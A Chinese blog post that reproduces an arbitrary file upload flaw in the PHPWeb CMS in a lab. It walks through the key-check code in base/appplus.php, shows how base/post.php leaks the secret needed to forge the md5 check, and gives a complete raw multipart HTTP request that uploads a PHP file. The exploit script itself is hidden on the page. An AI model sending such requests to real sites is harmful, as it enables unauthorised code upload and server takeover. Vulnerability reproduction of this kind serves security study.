phpweb前台任意文件上传漏洞复现和分析

少羽.
392
文章
72
评论
2020年1月31日19:18:39 3 1,382 2714字阅读9分2秒

测试代码

一、环境搭建

宝塔Windows 6.5.0    +Nginx 1.17 + PHP 5.2 (PS:注意5.2最稳 其他版本可能报错)

安装成功之后。分析代码

首先找到

base/appplus.php

主要代码如下:

//密钥校验
$k=md5(strrev($dbUser.$dbPass));
$h=$_SERVER["HTTP_REFERER"];
$t=$_POST["t"];
$m=$_POST["m"];
$act=$_POST["act"];
$path=$_POST["path"];

$md5=md5($k.$t);
if($m!=$md5){
	echo "ERROR: 安全性校验错误";
	exit;
}

关键点在于

$k=md5(strrev($dbUser.$dbPass));

在同级搜索中,发现POST.php 会返回$k=md5(strrev($dbUser.$dbPass));

那么就是post base/post.php 参数传递一个act 如下:

这里就是返回了 $md5=md5($k.$t); 上面所需要的$k 和$t

那么只要md5 一下就可以得到$md5

如下:

那么数据包如下。发送

POST /base/appplus.php HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 746
Connection: close
Cookie: CODEIMG=325eaeac5bef34937cfdc1bd73034d17
Upgrade-Insecure-Requests: 1

-----------------------------191691572411478
Content-Disposition: form-data; name="act"

upload
-----------------------------191691572411478
Content-Disposition: form-data; name="m"

59f9fae38f9e6ba22c2816e3d17588d4
-----------------------------191691572411478
Content-Disposition: form-data; name="t"

1579254040
-----------------------------191691572411478
Content-Disposition: form-data; name="path"

upload
-----------------------------191691572411478
Content-Disposition: form-data; name="r_size"

18
-----------------------------191691572411478
Content-Disposition: form-data; name="file"; filename="1111.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------191691572411478--

然后感觉这样太麻烦了。就写了一个python的脚本

此处为隐藏的内容!
发表评论并刷新,方可查看

执行的方式

python    aaa.py http://192.168.1.210
继续阅读
  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
广告也精彩
  • 本文由 发表于 2020年1月31日19:18:39
discuz x3.4 getshell漏洞 漏洞分析

discuz x3.4 getshell漏洞

开始 2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利...
Joomla 3.0.0-3.4.6 RCE 漏洞复现分析 漏洞分析

Joomla 3.0.0-3.4.6 RCE 漏洞复现分析

前言 昨天就看到了许多安全媒体发布了Joomla RCE 漏洞的预警,一直到今天早上才有时间进行简单的复现和分析。 漏洞分析 主要是由于Joomla对于Session处理不当,可伪造Session,进...
discuz x3.4 getshell漏洞 漏洞分析

discuz x3.4 getshell漏洞

开始 2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利...
Joomla 3.0.0-3.4.6 RCE 漏洞复现分析 漏洞分析

Joomla 3.0.0-3.4.6 RCE 漏洞复现分析

前言 昨天就看到了许多安全媒体发布了Joomla RCE 漏洞的预警,一直到今天早上才有时间进行简单的复现和分析。 漏洞分析 主要是由于Joomla对于Session处理不当,可伪造Session,进...
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

评论:3   其中:访客  3   博主  0
    • avatar 1123 0

      牛逼啊

      • avatar 2799739595 0

        看看

        • avatar zz 0

          很强